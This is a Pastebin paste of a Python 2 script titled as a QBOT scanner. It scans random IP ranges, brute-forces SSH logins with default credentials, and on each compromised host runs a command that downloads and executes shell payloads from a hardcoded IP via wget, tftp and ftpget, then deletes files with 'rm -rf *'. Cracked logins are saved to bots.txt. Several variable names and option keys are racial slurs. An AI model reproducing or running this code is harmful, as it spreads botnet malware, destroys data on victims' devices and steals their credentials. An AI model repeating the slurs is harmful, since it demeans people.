Advertisement
Guest User

Python Scanner QBOT

a guest
Apr 14th, 2018
475
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.54 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3.  
  4. import threading, paramiko, random, socket, time, sys
  5.  
  6. paramiko.util.log_to_file("/dev/null")
  7.  
  8.  
  9. blacklist = [
  10. '127'
  11. ]
  12.  
  13.  
  14. passwords = [
  15. "telnet:telnet"
  16. "admin:1234",
  17. "root:root",
  18. "root:admin",
  19. "user:user",
  20. "guest:guest",
  21. "admin:admin"
  22.  
  23. ]
  24.  
  25. if sys.argv[4] == '1':
  26. passwords = ["root:root"]
  27. if sys.argv[4] == '2':
  28. passwords = ["guest:guest"]
  29. if sys.argv[4] == '3':
  30. passwords = ["admin:1234"]
  31. if sys.argv[4] == '4':
  32. passwords = ["telnet:telnet"]
  33. if sys.argv[4] == '5':
  34. passwords = ["root:root", "admin:1234"]
  35. if sys.argv[4] == '6':
  36. passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  37. if sys.argv[4] == '7':
  38. passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password", "admin:admin", "user:user", "test:test", "admin:12345", "admin:123456", "guest:guest", "root:password"]
  39. if sys.argv[4] == '8':
  40. passwords = ["root:root", "root:admin"]
  41. if sys.argv[4] == '9':
  42. passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  43. if sys.argv[4] == 'perl':
  44. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ]
  45. if sys.argv[4] == 'vps':
  46. passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Zero", "root:Password"]
  47. if sys.argv[4] == 'vps2':
  48. passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"]
  49.  
  50. print "\x1b[31mSetting Ssh Range"
  51. print "\x1b[Beginning Load.."
  52.  
  53. ipclassinfo = sys.argv[2]
  54. if ipclassinfo == "A":
  55. ip1 = sys.argv[3]
  56. elif ipclassinfo == "B":
  57. ip1 = sys.argv[3].split(".")[0]
  58. ip2 = sys.argv[3].split(".")[1]
  59. elif ipclassinfo == "C":
  60. ips = sys.argv[3].split(".")
  61. num=0
  62. for ip in ips:
  63. num=num+1
  64. if num == 1:
  65. ip1 = ip
  66. elif num == 2:
  67. ip2 = ip
  68. elif num == 3:
  69. ip3 = ip
  70. class sshscanner(threading.Thread):
  71. global passwords
  72. global ipclassinfo
  73. if ipclassinfo == "A":
  74. global ip1
  75. elif ipclassinfo == "B":
  76. global ip1
  77. global ip2
  78. elif ipclassinfo == "C":
  79. global ip1
  80. global ip2
  81. global ip3
  82. def run(self):
  83. while 1:
  84. try:
  85. while 1:
  86. thisipisbad='no'
  87. if ipclassinfo == "A":
  88. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  89. if ipclassinfo == "B":
  90. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  91. if ipclassinfo == "C":
  92. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  93. if ipclassinfo == "49":
  94. hAZZYE = ["49.144","49.145","49.146","49.147","49.148","49.149","49.150","49.151","49.228"]
  95. self.host = random.choice(hAZZYE)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  96. if ipclassinfo == "122":
  97. Nigger = ["122.3","122.2","122.52","122.54","122.174","122.237","122.176","122.166","122.172","122.163","122.179"]
  98. self.host = random.choice(Nigger)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  99. if ipclassinfo == "NIGGER":
  100. Beaner = ["186.232","186.119","186.39","122.164","186.59","131.255","186.250","200.33","186.57","186.61","186.134","186.128"]
  101. self.host = random.choice(Beaner)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  102. if ipclassinfo == "119":
  103. SHIT = ["119.91","119.92","119.93","119.94","119.95"]
  104. self.host = random.choice(SHIT)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  105. if ipclassinfo == "FAST_1":
  106. fast1 = fast1 = [ "5.78","1.20","122.170","122.164","201.176","200.33","131.255" ]
  107. self.host = random.choice(fast1)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  108. if ipclassinfo == "FAST_2":
  109. fast = fast = [ "59.69","124.107","112.209","49.228","49.150","49.149","122.2" ]
  110. self.host = random.choice(fast)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  111. if ipclassinfo == "FAST_3":
  112. fast3 = fast3 = [ "12.188","14.162","14.33","13.92","103.57","14.67","14.177" ]
  113. self.host = random.choice(fast3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  114. if ipclassinfo == "ADMIN":
  115. fast3 = fast3 = [ "31.23","2.60","188.114","49.79","122.58","201.71" ]
  116. self.host = random.choice(fast3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  117. if ipclassinfo == "ROOT":
  118. fast5 = fast5 = [ "186.59","186.61","186.114","186.39","186.128","186.133" ]
  119. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  120. if ipclassinfo == "190":
  121. fast5 = fast5 = [ "190.174","190.175","190.173","190.172","190.176","190.177" ]
  122. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  123. if ipclassinfo == "191":
  124. fast5 = fast5 = [ "191.80","191.81","191.82","191.83","191.84","191.85" ]
  125. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  126. if ipclassinfo == "112":#"179.40","179.39","179.38","179.37","179.36"
  127. fast5 = fast5 = [ "112.206","112.205","112.203","112.202","112.201" ]
  128. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  129. if ipclassinfo == "179":#"179.40","179.39","179.38","179.37","179.36"
  130. fast5 = fast5 = [ "179.40","179.39","179.38","179.37","179.36" ]
  131. self.host = random.choice(fast5)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  132. if ipclassinfo == "LUCKY3":
  133. lucky3 = [ "188.245", "181.20", "181.24", "186.128", "186.132", "186.39", "186.56", "186.57", "186.58", "186.60" ]
  134. self.host = random.choice(lucky3)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  135. elif ipclassinfo == "LRAB":
  136. lrabz = ["122","186","119","168"]
  137. self.host = random.choice(lrabz)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  138. elif ipclassinfo == "LUCKY":
  139. lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","101.108","1.20","125.25","125.26","182.52","118.172","118.174","118.175","125.24","180.180"]
  140. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  141. elif ipclassinfo == "LUCKY1":
  142. lucky1 = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","1.20"]
  143. self.host = random.choice(lucky1)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  144. elif ipclassinfo == "LUCKY2":
  145. lucky2 = lucky2 = [ "122.3","210.213","59.69","122.52","122.54","119.93","124.105","125.104","119.92","119.91" ]
  146. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  147. elif ipclassinfo == "LUCKY22":
  148. lucky22 = lucky22 = [ "122.3","210.213","59.69","122.52","122.54","119.93","124.105","125.104","119.92","119.91","49.144","49.145","49.146","49.147","49.148","49.149","49.150","180.180" ]
  149. self.host = random.choice(lucky22)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  150. for badip in blacklist:
  151. if badip in self.host:
  152. thisipisbad='yes'
  153. if thisipisbad=='no':
  154. break
  155. username='root'
  156. password=""
  157. port = 22
  158. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  159. s.settimeout(1)
  160. s.connect((self.host, port))
  161. s.close()
  162. ssh = paramiko.SSHClient()
  163. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  164. dobreak=False
  165. for passwd in passwords:
  166. if ":n/a" in passwd:
  167. password=""
  168. else:
  169. password=passwd.split(":")[1]
  170. if "n/a:" in passwd:
  171. username=""
  172. else:
  173. username=passwd.split(":")[0]
  174. try:
  175. ssh.connect(self.host, port = port, username=username, password=password, timeout=1)
  176. dobreak=True
  177. break
  178. except:
  179. pass
  180. if True == dobreak:
  181. break
  182. badserver=True
  183. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  184. output = stdout.read()
  185. if "inet addr" in output:
  186. badserver=False
  187. if badserver == False:
  188. print '\x1b[35mConnection Established!\x1b[33m '+self.host+'|'+username+'|'+password+'|'+str(port)
  189. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.67.214.14/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 194.67.214.14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.67.214.14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.67.214.14 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
  190. nigger = open("bots.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  191. ssh.close()
  192. time.sleep(10)
  193.  
  194.  
  195. except:
  196. pass
  197.  
  198. for x in range(0,int(sys.argv[1])):
  199. try:
  200. t = sshscanner()
  201. t.start()
  202. except:
  203. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement